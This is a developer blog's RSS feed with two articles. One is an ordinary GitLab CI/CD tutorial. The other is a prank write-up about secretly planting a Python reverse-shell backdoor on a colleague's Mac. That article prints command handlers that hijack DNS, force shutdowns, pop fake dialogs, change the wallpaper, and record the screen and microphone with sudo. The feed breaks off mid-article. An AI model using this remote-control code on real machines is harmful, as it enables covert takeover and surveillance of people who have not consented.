<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: Tomas Martincic</title>
    <description>The latest articles on Forem by Tomas Martincic (@martincic).</description>
    <link>https://forem.com/martincic</link>
    
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/martincic"/>
    <language>en</language>
    <item>
      <title>Structuring a CI/CD workflow in GitLab (Node.js example)</title>
      <dc:creator>Tomas Martincic</dc:creator>
      <pubDate>Thu, 03 Feb 2022 08:25:20 +0000</pubDate>
      <link>https://forem.com/lloyds-digital/structuring-a-cicd-workflow-in-gitlab-nodejs-example-2500</link>
      <guid>https://forem.com/lloyds-digital/structuring-a-cicd-workflow-in-gitlab-nodejs-example-2500</guid>
      <description>&lt;h2&gt;
  
  
  Table of contents
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;What are pipelines&lt;/li&gt;
&lt;li&gt;DevOps pipelines&lt;/li&gt;
&lt;li&gt;What CI/CD pipeline software to use?&lt;/li&gt;
&lt;li&gt;Why did we choose GitLab?&lt;/li&gt;
&lt;li&gt;Docker Technology&lt;/li&gt;
&lt;li&gt;gitlab-ci.yml file&lt;/li&gt;
&lt;li&gt;Pipeline lifecycle example&lt;/li&gt;
&lt;li&gt;Conclusion&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  What are pipelines
&lt;/h2&gt;

&lt;p&gt;In computing, pipeline refers to the logical queue that is filled with all the instructions for the computer processor to process in parallel. It is the process of storing and queuing tasks and instructions that are executed simultaneously by the processor in an organized way. &lt;/p&gt;

&lt;p&gt;This is different from the regular queue or stack data structures in computer science. These data structures work in FIFO or LIFO approaches, respectively. This means literally "&lt;strong&gt;F&lt;/strong&gt;irst &lt;strong&gt;I&lt;/strong&gt;n &lt;strong&gt;F&lt;/strong&gt;irst &lt;strong&gt;O&lt;/strong&gt;ut" or "&lt;strong&gt;L&lt;/strong&gt;ast &lt;strong&gt;I&lt;/strong&gt;n &lt;strong&gt;F&lt;/strong&gt;irst &lt;strong&gt;O&lt;/strong&gt;ut" principles, no matter if working with elements, instructions, files, or any other arbitrarily listable item. &lt;/p&gt;

&lt;h2&gt;
  
  
  DevOps pipelines
&lt;/h2&gt;

&lt;p&gt;DevOps is a set of practices that combines software development and IT operations. It aims to shorten the systems development life cycle and provide continuous delivery with high software quality. DevOps is complementary with Agile software development; several DevOps aspects came from the Agile methodology.&lt;/p&gt;

&lt;p&gt;So if you're planning on having an 'agile' work environment, you must have good software foundations and automation processes set in place to achieve fast-paced development and results. If everything is done manually, the environment would be rigid, stiff, and slow, thus being the exact opposite of agile.&lt;/p&gt;

&lt;h2&gt;
  
  
  What is CI/CD?
&lt;/h2&gt;

&lt;p&gt;In software engineering, CI/CD or CICD is the combined practice of continuous integration and either continuous delivery or continuous deployment. CI/CD bridges the gaps between development and operation activities and teams by enforcing automation in the building, testing, and deployment of applications. This would preferably shorten the gap between developers developing the project locally in their IDE and the project being published in their normal production environment, either on public domain for clients or private domain for staging with other branches of the product development lifecycle (backend/frontend/design/QA/testers/...).&lt;/p&gt;

&lt;h4&gt;
  
  
  It works on my machine ¯\&lt;em&gt;(ツ)&lt;/em&gt;/¯
&lt;/h4&gt;

&lt;p&gt;Not only that we've shortened the gap between the developer and productional environment, but we've also introduced an assurance that it will work within the productional environment. The main component of CI/CD is that we run install/compilation, build, and test inside environment which mimics production. Therefore we've eliminated the chance of "&lt;em&gt;but it works on my machine&lt;/em&gt;" happening.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk5smzoxr1ijqsukrk9tl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk5smzoxr1ijqsukrk9tl.png" alt="Gitlab pipeline flow"&gt;&lt;/a&gt;&lt;br&gt;
Gitlab's CI/CD flow, other software uses mostly similar flow&lt;/p&gt;

&lt;h2&gt;
  
  
  What CI/CD pipeline software to use?
&lt;/h2&gt;

&lt;p&gt;There are many options available to provide continuous delivery and integration in your software development lifecycle. Some of the most popular CI/CD tools are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jenkins.io" rel="noopener noreferrer"&gt;Jenkins&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://circleci.com" rel="noopener noreferrer"&gt;CircleCI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://about.gitlab.com" rel="noopener noreferrer"&gt;GitLab&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jetbrains.com/teamcity" rel="noopener noreferrer"&gt;TeamCity&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.atlassian.com/software/bamboo" rel="noopener noreferrer"&gt;Bamboo&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/features/actions" rel="noopener noreferrer"&gt;GitHub Actions&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The tool for the job is a personal preference and depends on which of these tools fit your project, budget, requirements, language, technology, etc.&lt;/p&gt;

&lt;p&gt;From this point on, we will focus on &lt;strong&gt;GitLab's pipeline&lt;/strong&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why did we choose GitLab?
&lt;/h2&gt;

&lt;p&gt;Well, the choice was not a hard one. GitLab is our default VCS and provides a rich set of features for CI/CD pipelines leveraging the Docker technology. The beauty of in-house CI/CD integration with your VCS is that the pipeline itself can be triggered upon various events from the developers. The pipeline itself can be configured in a way that it triggers certain code blocks in all kinds of situations. For example, it can be triggered upon pushing to a certain branch, or by providing some sort of specific trigger key within commit message, it can be triggered upon Merge Requests, upon the success of those merges, etc. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiz98lz5kxqg41mhkjhbp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiz98lz5kxqg41mhkjhbp.png" alt="Gitlab pipeline stages"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This approach allows the DevOps engineer to configure the pipeline in a way that other software engineers mindlessly continue with their usual workflows and are completely oblivious to what's happening in the background. This is great because now you need only one good engineer to configure and maintain it, whereas the rest of the team/organization does not have to bother with learning the technology inside out to use it.&lt;/p&gt;

&lt;p&gt;Alongside being our default VCS and having great flexibility, it can also be hosted on-premise. This way we are not using GitLab's servers (also called runners) but our own. GitLab's pipeline will only charge you for computing time on their servers so we are saving some money. But GitLab does have fast servers which are relatively cheap (10$ for 1000min of computation). That would be a good approach for big companies, it would cost much less in the long run than configuring their cluster of runners. &lt;/p&gt;

&lt;h2&gt;
  
  
  Docker Technology
&lt;/h2&gt;

&lt;p&gt;Docker is a set of 'platform as a service' products that use OS-level virtualization to deliver software in packages called containers. Containers are isolated from one another and bundle their software, libraries, and configuration files; they can communicate with each other through well-defined channels. A Docker container image is a lightweight, standalone, executable package of software that includes everything needed to run an application: code, runtime, system tools, system libraries, and settings. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwa2gd3q1qp20xw9p1aso.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwa2gd3q1qp20xw9p1aso.jpg" alt="Docker vs Virtual Machine"&gt;&lt;/a&gt;&lt;br&gt;
&lt;strong&gt;The main difference between Docker and Virtual machines is that docker is running within its container virtualization engine, whereas virtual machines virtualize whole guest operating systems.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;In raw, the docker allows you to simulate the production environment by replicating it beforehand and then containerizing it and publishing to &lt;a href="https://hub.docker.com" rel="noopener noreferrer"&gt;hub.docker.com&lt;/a&gt;. The important thing to consider is that you want to keep your docker image as minimalistic as possible because it does produce a heavy load for the machine using it. You want to containerize only the service which you need to use and test, eg. for our backend stack, we've had to containerize PHP 8 on Ubuntu, and we've added node, npm, and composer to the container. That's it, voila! Now you'd think that it's smart to ship other technologies to the same container, for example, using this container to test the frontend services would be pretty inefficient.&lt;/p&gt;

&lt;p&gt;A much better approach is to use a different image for each stack you require because otherwise, you will have unused software within your container. &lt;br&gt;
&lt;em&gt;"Yeah I have it on my computer and server too, so what's the deal?"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The thing is, for every job in the pipeline, once started, the docker fires a fresh container and boots it up. If you want it to be fast, you want it to be as minimal as possible. Meaning that the backend will have only backend software on its image, whereas the frontend will only boot up node.js image, without PHP and composer. Separating services in different containers will help you speed up the pipeline overall.&lt;/p&gt;

&lt;p&gt;The boot time is the biggest overhead that you get with additional software, but only if you are using the self-hosted runner. Otherwise, if you're running the pipeline on GitLab servers, you need to download the image (container) at every step of the pipeline. And if you have big images with unneeded software, you will both download and boot longer, and GitLab charges per minute of processing time, meaning that you're twice as inefficient. &lt;/p&gt;

&lt;h2&gt;
  
  
  GitLab-ci.yml file
&lt;/h2&gt;

&lt;p&gt;YAML is used because it is easier for humans to read and write than other common data formats like XML or JSON. Further, there are libraries available in most programming languages for working with YAML. For a syntactic guidelines of YAML files, &lt;a href="http://giybf.com" rel="noopener noreferrer"&gt;Google is your best friend&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;This file is the main configuration for your Gitlab pipeline. Whenever you add this file to your project, Gitlab will go through it whenever you change something within your project. Here you will define the flow of your pipeline, jobs, stages, what it will do, when will it execute, etc. By default, it will use shared GitLab runners where you'll have &lt;a href="https://about.GitLab.com/blog/2020/09/01/ci-minutes-update-free-users/#changes-to-the-gitlabcom-free-tier" rel="noopener noreferrer"&gt;400 free minutes&lt;/a&gt; monthly, by default.&lt;/p&gt;

&lt;p&gt;The YAML file has a variety of keywords and control structures so you're able to define the what and when. The content of the job, within the &lt;code&gt;script&lt;/code&gt; tag, are the commands which will execute inside the docker container containing your application. Here are some of the most commoontrol structures: &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;image&lt;/code&gt; - defines which docker container will run for given job/pipeline (pulls from &lt;a href="https://hub.docker.com" rel="noopener noreferrer"&gt;hub.docker.com&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;stages&lt;/code&gt; - define stages in which you can group your jobs. Stages run serially (one after another), whereas jobs within the same stage run in parallel &lt;/li&gt;
&lt;li&gt;
&lt;code&gt;only&lt;/code&gt; - defines when a job will run (eg. only on merge request)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;artifacts&lt;/code&gt; - defines which files will be shared between different jobs (because the new container is initialized per job, thus contents are lost unless specified with artifacts)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;cache&lt;/code&gt; - defines which files will be saved to the server for retrospection&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;script&lt;/code&gt; - defines what commands will be executed within the container (OS-level commands, eg. &lt;code&gt;echo&lt;/code&gt;, &lt;code&gt;apt-get install&lt;/code&gt;, &lt;code&gt;composer install xy&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These are some of the main control structures out of many, for more you can &lt;a href="https://docs.gitlab.com/ee/ci/yaml/index.html" rel="noopener noreferrer"&gt;check the documentation&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Pipeline lifecycle example
&lt;/h2&gt;

&lt;p&gt;The pipeline starts from the &lt;code&gt;.gitlab-ci.yml&lt;/code&gt; file. Here we'll analyze a simple pipeline configuration and what happens each step of the way. We will consider the following pipeline for a front-end project. &lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

image: node:latest

stages:
  - build
  - run

# Job's name
first-job:
  # Define stage
  stage: build
  # What to run on the job.
  script:
    - npm install
  artifacts:
    paths:
      - node_modules

second-job:
  stage: run
  script:
    - npm run start
    - node test.js
  artifacts:
    paths:
      - node_modules/

second-job-parallel:
  stage: run
  script:
    - echo "I'm running at the same time as second-job!!!"


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;As we can see, we have two stages, first stage installs the modules and has only one job. The second stage kicks in if the first one finishes successfully and starts two jobs in parallel.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdfpk7kplpm9tqm6htqc8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdfpk7kplpm9tqm6htqc8.png" alt="Gitlab's visualization of stages and jobs"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Gitlab's visualization of stages and jobs&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The first thing that happens once you push your code is that GitLab scans the &lt;code&gt;.gitlab-ci.yml&lt;/code&gt;. If there are no limitations in configuration, the pipeline will be running on every push, merge request and merge result. Gitlab will then contact the 'runner', aka. the server which will be executing your pipeline. &lt;strong&gt;Note&lt;/strong&gt;, if you have a single GitLab runner they will queue in FIFO principle. &lt;/p&gt;

&lt;p&gt;Once the server responds, it will start the docker executor with the image you've specified. In our case, it is &lt;a href="https://hub.docker.com/_/node?tab=tags&amp;amp;page=1" rel="noopener noreferrer"&gt;node:latest&lt;/a&gt;. If required, you can specify a different image for each job. If the server has the image cached, it will start using it, otherwise, it will have to download it first.&lt;/p&gt;

&lt;p&gt;Then, once you have your container ready and booted up, your project will be downloaded from your repository and once you're placed into the project root directory, it will start executing commands you've provided within the &lt;code&gt;scripts&lt;/code&gt; list. In our case, it will install node modules. Once the job is finished, the artifacts will be uploaded so the next job using can download them back into the container. Then the cleanup kicks in and the container is closed.&lt;/p&gt;

&lt;p&gt;The second job is different, but only slightly. It will download the artifacts right after the project is downloaded, so we have everything ready for scripts. Once this job finishes, it will again upload the modified artifacts for whoever might be using them next. Other than that, it is the same as the first job regarding the structure. But the commands are slightly different, and here as an example, we run test.js to test if our application is working. Here are the contents of test.js:&lt;/p&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

&lt;p&gt;console.log('Hello from Node.js!')&lt;br&gt;
console.log(new Date().toUTCString())&lt;br&gt;
console.log('Exiting Node.js...')&lt;/p&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;h4&gt;
&lt;br&gt;
  &lt;br&gt;
  &lt;br&gt;
  Here is the output from the second job:&lt;br&gt;
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqc0aa7e05crmojzuy2yo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqc0aa7e05crmojzuy2yo.png" alt="Pipeline output on gitlab"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And the last job is no different from the others, it just proved to us that two jobs can indeed run in parallel.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;To conclude the pipelines, I would say that it is a &lt;strong&gt;must&lt;/strong&gt; for any serious company to have these operations set in stone. Human error is removed from the equation and monotonous tasks are automatized. A good pipeline will also deploy the code to a staging server, the company's internal server for testing, quality assurance, and collaboration; but ultimately all productional deploys should be done manually by setting &lt;code&gt;when&lt;/code&gt; key to &lt;code&gt;manual&lt;/code&gt; in &lt;code&gt;.gitlab-ci.yml&lt;/code&gt; file. Many many more things could be done within the pipeline such as benchmarking the app, stress-testing, and others. I might cover them in the next blog, but until then, what features do you think would make an awesome pipeline? &lt;/p&gt;

&lt;p&gt;Lloyds is available for partnerships and open for new projects. If you want to know more about us, click &lt;a href="https://lloyds-digital.com/" rel="noopener noreferrer"&gt;here&lt;/a&gt;.&lt;br&gt;
Also, don’t forget to follow us on &lt;a href="https://www.instagram.com/lloyds.digital/" rel="noopener noreferrer"&gt;Instagram&lt;/a&gt; and &lt;a href="https://www.facebook.com/lloydsdigital/" rel="noopener noreferrer"&gt;Facebook&lt;/a&gt;!&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>git</category>
      <category>pipeline</category>
      <category>cicd</category>
    </item>
    <item>
      <title>How to hack your colleague with Python</title>
      <dc:creator>Tomas Martincic</dc:creator>
      <pubDate>Fri, 30 Jul 2021 06:53:59 +0000</pubDate>
      <link>https://forem.com/martincic/how-to-prank-hack-your-colleague-34lo</link>
      <guid>https://forem.com/martincic/how-to-prank-hack-your-colleague-34lo</guid>
      <description>&lt;h2&gt;
  
  
  Result of our actions
&lt;/h2&gt;

&lt;p&gt;Imagine one peaceful morning, you start working on your laptop and suddenly - your laptop starts restarting. Once. Twice. Your work is not saved and you are somewhat frustrated. Then suddenly, fishy NSFW websites start popping up. There is confusion in the air. &lt;/p&gt;

&lt;p&gt;Next thing you know, your internet is not working. Your client's API is effectively returning you 404; your browser is returning 404, you are offline from the company's Slack for no apparent reason. But the whole office is online, and we are all on the same Wi-Fi?! &lt;/p&gt;

&lt;p&gt;After 20 min of troubleshooting, your laptop started working again. Finally, you get your connection, perform a factory reset and have a squeaky clean PC to work with. You start a meeting, and suddenly the computer goes crazy and starts playing pig noises at a full volume in the middle of the office. Then background changes to NSFW background, there are loud NSFW voices coming from your laptop, and CTO is giving you sh*t to turn it all down because the office is on fire (people rolling on the floor laughing). Who would've imagined everyone in the office in that moment, were part of the prank that's being pulled on you?&lt;/p&gt;

&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;First of all, I want everyone to understand that what I am about to present is for &lt;strong&gt;educational purposes only&lt;/strong&gt;. These methods should not be abused for purposes they are not meant to serve.&lt;/p&gt;

&lt;p&gt;So it all started one sunny morning in the office kitchen. Luka and I were drinking coffee, making jokes about hacking NASA. The CEO overheard us and suggested we should prank hack someone from the office if we had free time. Our eyes lit up like children's in a candy shop. Luckily for us, we always have free time, and we started working immediately. Luka's &lt;a href="https://urn.nsk.hr/urn:nbn:hr:211:231137"&gt;master's thesis&lt;/a&gt; gave us a good head start since he was writing about &lt;em&gt;Methods of ethical hacking&lt;/em&gt;. There he wrote a python program capable of a reverse shell with client and server code being together 65 lines. About 3 hours later, at our backend team code review, we've had a prototype working. It could execute various commands for us, SSH access, and the client had reverse shell backdoor in case the SSH was shutdown. The CTO (our team lead) was impressed, and we've got a green light to use all resources available to make this happen.&lt;/p&gt;

&lt;h2&gt;
  
  
  Structure of the attack
&lt;/h2&gt;

&lt;p&gt;The script was split into two parts, the server and the client. Since this was a reverse shell attack, we (hackers) were the server, and the hacked person was the client. This only required us to set up his laptop to run the client on startup. This way, whenever he was in the office, the script was running in the background. It was constantly checking if the server is available, and once we started our server, we would reconnect. The beauty of reverse shell is that we could've abused him from anywhere on the planet. This is because the only port-forwarding that should've been configured was at the server-side. The client was creating outgoing requests, and the router would not block them. Once we sent a command from the server, the client would receive the command, parse the command if there was some extra work; if there was nothing to parse, we would pipe it into the terminal.&lt;/p&gt;

&lt;h2&gt;
  
  
  Usage of the program
&lt;/h2&gt;

&lt;p&gt;The program which we used as a layer between us and the hacked colleague (further on referenced as 'the client') was written in Python. By default, what we've had from Luka's &lt;a href="https://urn.nsk.hr/urn:nbn:hr:211:231137"&gt;master's thesis&lt;/a&gt; was direct shell access, but we expanded it to be a filter for incoming commands. For example, if we wanted to open up a program, it was very simple to open it with &lt;code&gt;open programName&lt;/code&gt; in a shell. &lt;/p&gt;

&lt;p&gt;But if we wanted to randomize the whole desktop, create dummy folders, and hide items within, this required many commands. We would put this logic inside a function, and when we receive a command which we defined (eg. 'randomize-desktop N' where N is a number of folders) we would simply call the corresponding function and feed it parameter N. &lt;/p&gt;

&lt;p&gt;The flow of this system was the following: &lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;commands were coming from the server to the client&lt;/li&gt;
&lt;li&gt;client would try to parse the command into one of its internal functions&lt;/li&gt;
&lt;li&gt;if none corresponded it would simply pipe the result directly into the shell&lt;/li&gt;
&lt;li&gt;repeat indefinitely&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Server.py
&lt;/h3&gt;

&lt;p&gt;The server initializes the socket on some arbitrary port that is usually not used. It also sets up the number of possible incoming connections; in our case, it was 5. This would allow us to have Command and Control center for up to 5 clients at a time. Currently, we would not distinguish them, so when sending a command, we'd send it to all clients. &lt;code&gt;send_commands&lt;/code&gt; function is called at the end; it is stuck in while true loop asks us for input. If we input some data, we turn it into a byte array and if greater than 0 bytes of data were inputted, we send it to client/s which are connected to our socket.&lt;/p&gt;

&lt;h3&gt;
  
  
  Client.py
&lt;/h3&gt;

&lt;p&gt;The client initializes a socket that connects to our server at our desired arbitrary port. Everything that receives, decodes to utf-8 and pipes it into the shell. All the output is read from the shell, translated into a byte array, and sent back to Command and Control server.&lt;/p&gt;

&lt;h4&gt;
  
  
  Learn more
&lt;/h4&gt;

&lt;p&gt;Base code for server.py and client.py are further explained in my colleague's &lt;a href="https://urn.nsk.hr/urn:nbn:hr:211:231137"&gt;master's thesis&lt;/a&gt; on pages 54 and 55. I will, from here onwards, explain command by command. If there is any uncertainty, leave a comment below, and we'll discuss it further.&lt;/p&gt;

&lt;h2&gt;
  
  
  List of commands and abilities
&lt;/h2&gt;

&lt;p&gt;I will skip over some commands such as 449 &amp;amp; 450, which are composites of other commands. For example, 450 is just a combination of &lt;code&gt;set-bg&lt;/code&gt; and &lt;code&gt;play-sound&lt;/code&gt;. Also, 8000 is equivalent to the &lt;code&gt;say&lt;/code&gt; command, which can be found on OSx. Media command is short for &lt;code&gt;ls media&lt;/code&gt;. For play-sound, we changed the implementation from using python's play-sound library to using OSx's default afplay. The beauty of playing music this way is that the audio file cannot be turned off because you can't see any window. It's a process under the hood that is playing it.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
404: Turns internet off - sets DNS to non-existing one&lt;/li&gt;
&lt;li&gt;
409: Restarts PC&lt;/li&gt;
&lt;li&gt;
423: Hibernates PC&lt;/li&gt;
&lt;li&gt;449: Plays Windows error message - Usage: (449) plays sound once. If you want to play N times use 449 N&lt;/li&gt;
&lt;li&gt;450: Plays Windows XP error sound and sets windows XP background&lt;/li&gt;
&lt;li&gt;8000: Tells something to the client - text-to-speech AI will interpret your text to sound on client’s laptop - Usage: 8000 “hello world”&lt;/li&gt;
&lt;li&gt;media: Lists available media&lt;/li&gt;
&lt;li&gt;
dialog: Shows message dialog - Usage: pass parameters and split with semicolon Title_Body_Button1_Button2&lt;/li&gt;
&lt;li&gt;
screen: Records screen for N seconds - Usage: ex. screen N fileName.mp4 - N is number of seconds, fileName is name of recording file&lt;/li&gt;
&lt;li&gt;
set-bg: Sets background - Usage: ex. set-bg fileName.png - find files with media command&lt;/li&gt;
&lt;li&gt;play-sound: Plays sound - Usage: ex. play-sound fileName.mp3 - find files with media command&lt;/li&gt;
&lt;li&gt;
upload: Uploads file to victim - Usage: ex. upload filename.ext - files are located at C:\xampp\htdocs&lt;/li&gt;
&lt;li&gt;
folders: Creates N random folders and existing desktop items are moved in them - Usage: ex. folders N, where N is number of folders&lt;/li&gt;
&lt;li&gt;volume control&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  404
&lt;/h4&gt;

&lt;p&gt;Back to list of commands&lt;br&gt;
This is an internet toggle. There is this nice command within OSx called network setup where you can configure various network information. We've decided to turn the DNS off because it's quite hard to troubleshoot.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;def switchDNS(client, condition):
    ip = '123.123.123.123' #Non existing dns
    output = 'INTERNET TURNED OFF - Client's internet will now appear as offline and all content will respond with 404'
    if condition:
        ip = '8.8.8.8' #Google's DNS
        output = 'INTERNET TURNED ON - Client's internet will now appear normal'

    command = 'networksetup -setdnsservers Wi-Fi ' + ip
    cmd = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    respond(client, output)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is mostly self-explanatory except the subprocess.Popen part. This pipes the string (command variable) to shell and executes it.&lt;/p&gt;

&lt;h4&gt;
  
  
  409-423
&lt;/h4&gt;

&lt;p&gt;Back to list of commands&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;def hybernatePC(client):
    respond(client, "Hybernating PC...")
    os.system("shutdown -h now")

def restartPC(client):
    respond(client, "Restarting PC...")
    os.system("shutdown -r now")
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;import os&lt;/code&gt; allows us to execute a command in shell, much like subprocess.Popen. The only difference is that os.system sometimes does not have enough permission to execute given commands. I've grouped these two commands because the only thing that's changing here is the parameter &lt;code&gt;-r&lt;/code&gt; or &lt;code&gt;-h&lt;/code&gt; which defines what kind of shutdown will happen.&lt;/p&gt;

&lt;h4&gt;
  
  
  dialog
&lt;/h4&gt;

&lt;p&gt;Back to list of commands&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;def messageDialog(client, data):
    items = data[7:].split('_')    
    print(items)
    title = items[0]
    body = items[1]
    button1 = items[2]
    button2 = items[3]
    output = "Message dialog shown!"
    command = 'osascript -e \'display dialog "'+body+'" buttons {"'+button1+'", "'+button2+'"} with title "'+title+'"\' &amp;amp;&amp;gt;/dev/null'
    os.system(command)
    respond(client, output)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Here we parse the parameters from the data sent. Data is sent in title_body_button1_button2 format, all separated by an underscore. Then we have formatted the osascript command which displays the message dialog. We simply input our parsed parameters to the command in their designated place and execute the command.&lt;/p&gt;

&lt;h4&gt;
  
  
  screen
&lt;/h4&gt;

&lt;p&gt;Back to list of commands&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;def recordScreen(client, data):
    items = data[16:].split('_')
    seconds = items[0]
    file = items[1]
    dir = os.getcwd()
    respond(client, 'recording...')
    command = 'echo "123" | sudo -S screencapture -g -V ' +seconds+ ' ' +dir+'/media/'+file
    subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Screen recording takes seconds of screen time along with filename because the command does not know where to save the file. Along with the screen, the additional &lt;code&gt;-V&lt;/code&gt; parameter tells it to record audio from the microphone as well. Here we needed higher privileges and used &lt;code&gt;subprocess.Popen&lt;/code&gt;.&lt;/p&gt;

&lt;h4&gt;
  
  
  set-bg
&lt;/h4&gt;

&lt;p&gt;Back to list of commands&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;def changeBackground(client, img):
    dir = os.getcwd()
    command = 'osascript -e \'tell application "Finder" to set desktop picture to POSIX file "' + dir + '/media/'+img+'"\''
    cmd = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    output = "Background changed to " + img
    respond(client, output)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Change background will get a working directory, go-to media, and set the defined IMG file as the background. &lt;code&gt;osascript&lt;/code&gt; command is also predefined, and here we can see how the python filter came in nicely. We would send &lt;code&gt;set-bg image.png&lt;/code&gt; which is very readable and convenient, whereas &lt;code&gt;'osascript -e \'tell application "Finder" to set desktop picture to POSIX file "' + dir + '/media/'+img+'"\''&lt;/code&gt; is a bit less convenient or readable.&lt;/p&gt;

&lt;h4&gt;
  
  
  upload
&lt;/h4&gt;

&lt;p&gt;Back to list of commands&lt;br&gt;
